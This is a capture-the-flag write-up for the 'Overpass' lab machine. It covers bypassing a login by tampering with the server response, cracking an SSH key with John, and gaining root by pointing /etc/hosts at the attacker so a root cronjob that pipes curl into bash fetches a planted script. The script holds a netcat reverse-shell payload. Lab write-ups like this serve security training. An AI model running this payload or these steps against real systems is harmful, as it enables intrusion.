Overpass

Port Scan

Directory Scan

Web Exploitation
After seeing all the directories,
/admin
was most intresting to meLooking at the source code I found some intresting
.js
files

login.js

This piece of code has an vulnerability, it checks the response of the browser and if it doesn't incorrect credentials, it redirect us to the
/admin
page
get admin privilege
Intercept login request with burp suite and change the response to get the admin panel
Right-click on the request and >
Do intercept > Request to this response
This is the response we get

Updated response

Admin homepage

User Shell
we got username from the admin panel, I've used John to crack the SSH password

We successfully got a shell

Root shell
I've used python server to get
linpeas
into the machine


We have permission to write in
/etc/hosts

There's a cronjob running on root service which basicallay uses curl and pipe it into bash
We are going to change the content of
/etc/hosts
, adding our ip asoverpass.thm

First create files in your localhost

Add a payload in
buildscript.sh
└─$ cat downloads/src/buildscript.sh
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.9.1.250 4444 >/tmp/f
Add your ip and port
[ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc (IP) (PORT) >/tmp/f ]
Start a python3 server
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.120.231 - - [02/Feb/2022 18:17:05] "GET /downloads/src/buildscript.sh HTTP/1.1" 200 -
Start netcat listener
Wait around 1 minute to get root shell


Last updated